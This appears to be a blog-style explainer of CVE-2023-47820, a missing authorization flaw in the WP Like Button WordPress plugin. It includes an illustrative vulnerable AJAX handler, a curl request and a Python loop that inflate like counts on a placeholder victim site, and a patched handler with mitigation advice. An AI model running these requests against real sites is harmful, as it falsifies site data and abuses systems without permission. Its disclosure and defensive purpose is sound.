CVE-2023-47820 - Exploiting Missing Authorization in CRUDLab WP Like Button (<= 1.7.) – A Simple Guide

WordPress is the most popular CMS, and plugins like WP Like Button by CRUDLab add some fun social features for users, letting people “like” posts or pages. But even small features can hide big security problems if they’re not coded right.

Today, I will break down CVE-2023-47820, a missing authorization vulnerability in WP Like Button (any version up to 1.7.). I’ll explain what’s going on, why it’s dangerous, show you how an attacker could use it, and how admins can protect their site.

What Is CVE-2023-47820?

- CVE-2023-47820 is a vulnerability due to missing access control in the WP Like Button plugin for WordPress.
- It allows anyone, even unauthenticated users (not logged in), to perform actions meant only for authorized users.
- This means attackers can interact with the plugin’s liking system without any restrictions, which may break trust, pollute like statistics, or even perform other malicious actions depending on site configuration.

Status:

References

- CVE Details
- Plugin Vulnerabilities Report
- WP Like Button Plugin Page

How Does the Exploit Work?

The vulnerability happens because the plugin’s main AJAX endpoint responsible for liking/unliking doesn’t check if the request is coming from a logged-in user or if the user has the necessary permissions.

Here’s a simplified snippet of what often goes wrong in these plugins

// Located in plugin's AJAX handler file.
add_action('wp_ajax_nopriv_wplb_like', 'wplb_like_handler');
add_action('wp_ajax_wplb_like', 'wplb_like_handler');

function wplb_like_handler() {
    $post_id = intval($_POST['post_id']);
    // No checks for current_user_can() or is_user_logged_in()
    $likes = get_post_meta($post_id, '_wplb_likes', true);
    $likes++;
    update_post_meta($post_id, '_wplb_likes', $likes);

    wp_send_json_success(array(
        'likes' => $likes
    ));
    exit;
}

What's missing?

- Authorization Checks: There’s no code like if( ! is_user_logged_in() ) { /* ... */ } or a check for capability (current_user_can('something'))
- Nonce Validation: No check for WordPress nonces, so you can't be sure the request is coming from a legitimate page.

Real World Impact

With code like this, anyone on the internet can hit your site’s AJAX endpoint and increment the like count as much as they want, even with an automated script or bot.

The plugin exposes an AJAX action, typically at

https://your-wordpress-site.com/wp-admin/admin-ajax.php

Example using curl

curl -X POST https://victim.com/wp-admin/admin-ajax.php \
     -d "action=wplb_like&post_id=42"

Response

{"success":true,"data":{"likes":123}}

Do this as often as you want—no login needed, no security checks!

An attacker (or even mischief-maker) can automate this using a script

import requests

for i in range(100):
    r = requests.post(
        'https://victim.com/wp-admin/admin-ajax.php',
        data={'action': 'wplb_like', 'post_id': 42}
    )
    print(r.json())

This script could quickly rack up hundreds or thousands of fake likes, making the statistics useless or even triggering other issues if the like count is used elsewhere (for ranking or payment, for example).

Reputation Damage: If your site's like counts are obviously bogus, users lose trust.

- Resource Abuse: If an attacker runs this at scale, could trigger resource exhaustion or database bloat.
- Further Exploits: If other plugin features rely on these actions, it may open wider attack surfaces.
- Business Impact: Trust, analytics, partner relations, or revenue can be impacted if likes are used for performance metrics.

1. Update the Plugin!

CRUDLab fixed this vulnerability in version 1.7.1.
Upgrade immediately if you're running 1.7. or earlier.

2. Check for Nonces

Verify that your plugin uses WordPress nonces to prevent CSRF and unauthorized use.

3. Add Permission Checks

If you write code, always check if users are logged in or have the right permissions.

Sample Fix for the Handler

function wplb_like_handler() {
    if ( !is_user_logged_in() ) {
        wp_send_json_error('You must be logged in to like posts.');
        exit;
    }
    if ( !isset($_POST['_wpnonce']) || !wp_verify_nonce($_POST['_wpnonce'], 'wplb_like_nonce') ) {
        wp_send_json_error('Invalid nonce.');
        exit;
    }
    // ...rest of logic...
}

Conclusion

CVE-2023-47820 is a classic example of a “Missing Authorization” bug that’s easy to overlook, and even easier to abuse. If you run any plugin, make sure it’s up-to-date and properly validates every user interaction. If you develop plugins, always double-check security: don’t assume a public endpoint is safe without checks!

Summary:

Always keep plugins updated and add proper authorization for all actions.

More info:
- CVE-2023-47820 (MITRE)
- WPScan Vulnerability Page

Timeline

Published on: 12/09/2024 13:15:31 UTC